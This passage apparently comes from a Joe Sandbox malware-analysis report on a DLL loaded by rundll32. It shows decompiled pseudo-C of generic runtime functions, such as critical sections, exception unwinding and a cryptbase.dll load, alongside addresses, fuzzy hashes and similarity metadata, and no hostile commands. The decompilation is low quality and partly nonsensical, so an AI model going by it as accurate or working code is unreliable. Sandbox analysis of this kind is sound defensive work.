				0x80047280();
				if ( *_t44 != (_v32 ^ _t60)) goto 0x8003c84d;
				return _t34;
			}





























                                                                                                                                              0x18003c73d
                                                                                                                                              0x18003c745
                                                                                                                                              0x18003c74d
                                                                                                                                              0x18003c75a
                                                                                                                                              0x18003c762
                                                                                                                                              0x18003c767
                                                                                                                                              0x18003c76c
                                                                                                                                              0x18003c771
                                                                                                                                              0x18003c776
                                                                                                                                              0x18003c77b
                                                                                                                                              0x18003c780
                                                                                                                                              0x18003c785
                                                                                                                                              0x18003c78a
                                                                                                                                              0x18003c78f
                                                                                                                                              0x18003c794
                                                                                                                                              0x18003c7a0
                                                                                                                                              0x18003c7a2
                                                                                                                                              0x18003c7ae
                                                                                                                                              0x18003c7b3
                                                                                                                                              0x18003c7b6
                                                                                                                                              0x18003c7be
                                                                                                                                              0x18003c7cb
                                                                                                                                              0x18003c7d3
                                                                                                                                              0x18003c7dd
                                                                                                                                              0x18003c7e5
                                                                                                                                              0x18003c806
                                                                                                                                              0x18003c80e
                                                                                                                                              0x18003c81a
                                                                                                                                              0x18003c81c
                                                                                                                                              0x18003c827
                                                                                                                                              0x18003c83d
                                                                                                                                              0x18003c84c

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentThread
                                                                                                                                              • String ID: NoPayloadUserData$type
                                                                                                                                              • API String ID: 2882836952-2819996712
                                                                                                                                              • Opcode ID: 43088b86954a7e241adec3534b1cd4cdc7cef5ebbe3099f6373205e6ce1c7413
                                                                                                                                              • Instruction ID: 7d0afa8bffb2244ecd8e30d70163e6d773799dce188777eaf30168d516c9417c
                                                                                                                                              • Opcode Fuzzy Hash: 43088b86954a7e241adec3534b1cd4cdc7cef5ebbe3099f6373205e6ce1c7413
                                                                                                                                              • Instruction Fuzzy Hash: 01413972618B8885EBA2CB15F4803DBB3A4F788794F508115EACD43B59DF7CC299CB41
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000001800EB710 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                              • String ID: CCG $libunwind: _Unwind_RaiseException(ex_obj=%p)
                                                                                                                                              • API String ID: 3997070919-1152080672
                                                                                                                                              • Opcode ID: b2ab7ff41a5d150c20be46306c261fbaceeb91cb8d75672399ee3f1b25a7e5bf
                                                                                                                                              • Instruction ID: 832eed69f978a8297b639a8a6a9862f8da0ebd26de21277c64f48910085ade38
                                                                                                                                              • Opcode Fuzzy Hash: b2ab7ff41a5d150c20be46306c261fbaceeb91cb8d75672399ee3f1b25a7e5bf
                                                                                                                                              • Instruction Fuzzy Hash: 6AF0E930A1895842F7A65769A8097E063719F8D3D6F01C114ED89037A1EE39C7CB8340
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180053320 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11librarythreadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$CallsDisableLoadThread
                                                                                                                                              • String ID: cryptbase.dll
                                                                                                                                              • API String ID: 4137859361-1262567842
                                                                                                                                              • Opcode ID: 5b7cc86245fde41d4a56f141be57def860295e8d1d9b995770f2dc8f94b93f99
                                                                                                                                              • Instruction ID: e5794da3e5e8ffa415810be87e46ac157bec949f42c5ec3955bde5be55920edb
                                                                                                                                              • Opcode Fuzzy Hash: 5b7cc86245fde41d4a56f141be57def860295e8d1d9b995770f2dc8f94b93f99
                                                                                                                                              • Instruction Fuzzy Hash: A1D01270F0190981FBD69752DD897941391BBAC762FC0C010D405452B0ED39C79D8701
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180005852 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              C-Code - Quality: 17%
                                                                                                                                              			E00000001180005852(signed int __eax, void* __esi, void* __esp, signed int __rcx, void* __rdx, signed int __r8) {
				void* _v64;
				void* _v72;
				void* _t27;
				void* _t33;
				void* _t41;
				intOrPtr* _t50;
				void* _t54;
				struct _CRITICAL_SECTION* _t58;
				void* _t75;
				void* _t86;
				signed long long _t88;
				void* _t93;
				signed int* _t102;

				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t88 = _t86 - 0xffffffffffffffd1;
				_t102 =  *0x8011f718; // 0x18017b428
				 *(_t88 + 0x28) =  *_t102 ^ _t88;
				if (__rcx == 0) goto 0x800058c7;
				if ((__rcx & 0xfff00000) == __rcx) goto 0x800058cc;
				if ((__eax & 0x00000002) != 0) goto 0x80005924;
				goto 0x80005924;
				r12d = 0;
				goto 0x80005924;
				EnterCriticalSection(_t58);
				_t50 =  *0x8017c848;
				asm("pop ds");
				 *_t50 =  *_t50 + __eax;
				 *_t50 =  *_t50 + __eax;
				_t75 =  >  ? 0xffffffff : 0;
				if (_t75 == 0xffffffff) goto 0x800058f0;
				_t41 = _t75;
				if (_t41 == 0) goto 0x80005913;
				goto 0x800058f4;
				LeaveCriticalSection(??);
				_t54 = __rdx;
				_t80 =  <  ? 0 : __rdx;
				if (_t41 < 0) goto 0x8000596b;
				 *((long long*)(_t88 + 0x20)) = 0;
				_t27 = E000000011800086C0(__eax * __r8 >> 0x20, __esi, _t33, __rdx, _t88 + 0x20, __rcx,  <  ? 0 : __rdx, _t93);
				if (_t41 <= 0) goto 0x8000596b;
				if (_t54 == 0) goto 0x8000596b;
				0x8011d5e0();
				if ( *_t102 != ( *(_t88 + 0x28) ^ _t88)) goto 0x8000598f;
				return _t27;
			}
















                                                                                                                                              0x180005854
                                                                                                                                              0x180005855
                                                                                                                                              0x180005856
                                                                                                                                              0x180005857
                                                                                                                                              0x180005858
                                                                                                                                              0x180005859
                                                                                                                                              0x18000585a
                                                                                                                                              0x18000585b
                                                                                                                                              0x18000585c
                                                                                                                                              0x18000585d
                                                                                                                                              0x18000585e
                                                                                                                                              0x18000585f
                                                                                                                                              0x18000586b
                                                                                                                                              0x180005878
                                                                                                                                              0x180005886
                                                                                                                                              0x18000588e
                                                                                                                                              0x18000589c
                                                                                                                                              0x1800058bb
                                                                                                                                              0x1800058c5
                                                                                                                                              0x1800058c7
                                                                                                                                              0x1800058ca
                                                                                                                                              0x1800058d3
                                                                                                                                              0x1800058d9
                                                                                                                                              0x1800058e9
                                                                                                                                              0x1800058ec
                                                                                                                                              0x1800058ee
                                                                                                                                              0x1800058fd
                                                                                                                                              0x180005903
                                                                                                                                              0x180005905
                                                                                                                                              0x180005907
                                                                                                                                              0x180005911
                                                                                                                                              0x18000591e
                                                                                                                                              0x180005926
                                                                                                                                              0x18000592f
                                                                                                                                              0x180005933
                                                                                                                                              0x180005935
                                                                                                                                              0x180005949
                                                                                                                                              0x180005954
                                                                                                                                              0x180005959
                                                                                                                                              0x180005966
                                                                                                                                              0x18000597a
                                                                                                                                              0x18000598e

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                              • Opcode ID: 73378a86190afd0706e906dd62f358d8eaf605a07e436465ae959aec88530c1d
                                                                                                                                              • Instruction ID: b784667b405bfe7cfd2125976fc705dce0e1ab0aec402ecffbacdeed4c1520e8
                                                                                                                                              • Opcode Fuzzy Hash: 73378a86190afd0706e906dd62f358d8eaf605a07e436465ae959aec88530c1d
                                                                                                                                              • Instruction Fuzzy Hash: 9B51A431710A1881EE96DB1698443AA76A1BB8CFF4F158725EEBD477E4DE38C64AC300
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180005050 Relevance: 5.1, APIs: 4, Instructions: 117COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              C-Code - Quality: 52%
                                                                                                                                              			E00000001180005050() {
				signed long long _v56;
				void* _v64;
				long long _v72;
				void* _v1504;
				signed long long _v1512;
				void* _t26;
				void* _t28;
				void* _t29;
				void* _t31;
				signed long long _t33;
				intOrPtr _t43;
				signed long long _t44;
				struct _CRITICAL_SECTION* _t47;
				signed long long _t52;
				struct _CRITICAL_SECTION* _t64;
				struct _CRITICAL_SECTION* _t68;
				signed long long _t71;
				void* _t73;
				signed long long _t75;
				struct _CRITICAL_SECTION* _t77;
				void* _t80;
				signed int* _t81;
				void* _t83;

				goto 0x80005060;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t81 =  *0x8011f718; // 0x18017b428
				_v56 =  *_t81 ^ _t73 - 0x000005d8;
				if ( *0x8017c350 == 0) goto 0x80005177;
				EnterCriticalSection(_t47);
				r8d = 0x598;
				0x8011d5e0(_t80, _t83);
				_t52 =  *0x8017c8b8;
				_t33 = _t52;
				if (_t33 == 0) goto 0x8000516a;
				_v72 = 1;
				_v1512 = _t52;
				 *0x1 =  *0x1 + _t26;
				 *0x1 =  *0x1 + _t26;
				 *0x841F0F65FFFFFF8C =  *((intOrPtr*)(0x841f0f65ffffff8c)) + _t29;
				 *0x841F0F65FFFFFF86 =  *0x841F0F65FFFFFF86 | _t52;
				_t75 = _t71;
				if (_t33 == 0) goto 0x8000510d;
				 *((long long*)(_t75 + 0x5c0)) = 0x841f0f6600000002;
				 *(_t75 + 0x20f87b3000000028) = _t52;
				_t43 =  *((intOrPtr*)(_t75 + 0x5c0));
				_t15 = _t43 - 1; // 0x0
				if ( *((intOrPtr*)(_t75 + 0x20 + _t15 * 8)) != 0) goto 0x800050e0;
				 *((long long*)(_t75 + 0x5c8)) = 0x8017c8c0;
				if (_t43 == 0) goto 0x8000516a;
				_t44 = _t43 + 0xffffffff;
				_t65 =  *((intOrPtr*)(_t75 + 0x20 + _t44 * 8));
				if ( *((intOrPtr*)(_t75 + 0x20 + _t44 * 8)) == 0) goto 0x8000516a;
				EnterCriticalSection(_t64);
				E00000001180002650(1, _t31, _t65);
				LeaveCriticalSection(_t68);
				_t28 = E00000001180008990(_t44, _t75 + 0x20, 0x841f0f6600000002);
				if (_t44 != 0) goto 0x80005140;
				LeaveCriticalSection(_t77);
				if ( *_t81 != ( *(_t75 + 0x5d0) ^ _t75)) goto 0x8000519b;
				return _t28;
			}


























                                                                                                                                              0x180005050
                                                                                                                                              0x180005055
                                                                                                                                              0x180005056
                                                                                                                                              0x180005057
                                                                                                                                              0x180005058
                                                                                                                                              0x180005059
                                                                                                                                              0x18000505a
                                                                                                                                              0x18000505b
                                                                                                                                              0x18000505c
                                                                                                                                              0x18000505d
                                                                                                                                              0x18000505e
                                                                                                                                              0x18000505f
                                                                                                                                              0x180005070
                                                                                                                                              0x18000507d
                                                                                                                                              0x18000508d
                                                                                                                                              0x18000509a
                                                                                                                                              0x1800050a5
                                                                                                                                              0x1800050ad
                                                                                                                                              0x1800050b2
                                                                                                                                              0x1800050b9
                                                                                                                                              0x1800050bc
                                                                                                                                              0x1800050c2
                                                                                                                                              0x1800050cd
                                                                                                                                              0x1800050db
                                                                                                                                              0x1800050dd
                                                                                                                                              0x1800050df
                                                                                                                                              0x1800050e2
                                                                                                                                              0x1800050e5
                                                                                                                                              0x1800050e6
                                                                                                                                              0x1800050eb
                                                                                                                                              0x1800050f4
                                                                                                                                              0x1800050f9
                                                                                                                                              0x180005100
                                                                                                                                              0x18000510b
                                                                                                                                              0x180005114
                                                                                                                                              0x18000511e
                                                                                                                                              0x180005120
                                                                                                                                              0x180005123
                                                                                                                                              0x18000512b
                                                                                                                                              0x180005147
                                                                                                                                              0x18000514f
                                                                                                                                              0x180005157
                                                                                                                                              0x18000515d
                                                                                                                                              0x180005168
                                                                                                                                              0x180005171
                                                                                                                                              0x180005188
                                                                                                                                              0x18000519a

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                              • Opcode ID: 04dc8834ac65e3d8d94ee925593d5dde29145bb9e52ffa2e98503211b08bdc24
                                                                                                                                              • Instruction ID: 729228b23b5a60881b4e98d86980fe0202381ba58df87797698c7e4a5b04ba43
                                                                                                                                              • Opcode Fuzzy Hash: 04dc8834ac65e3d8d94ee925593d5dde29145bb9e52ffa2e98503211b08bdc24
                                                                                                                                              • Instruction Fuzzy Hash: A141AC36311A4881FBA6DB15EC547EA73A0FB9CBE1F448126ED9D43784EF38C2498B00
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%